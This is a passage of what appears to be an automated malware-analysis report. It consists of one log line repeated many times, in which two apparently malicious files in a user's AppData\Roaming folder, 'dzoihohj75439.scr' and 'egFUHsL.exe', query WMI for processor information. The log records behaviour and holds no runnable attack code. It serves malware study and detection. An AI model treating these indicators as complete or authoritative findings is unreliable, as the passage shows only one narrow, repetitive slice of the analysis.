                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
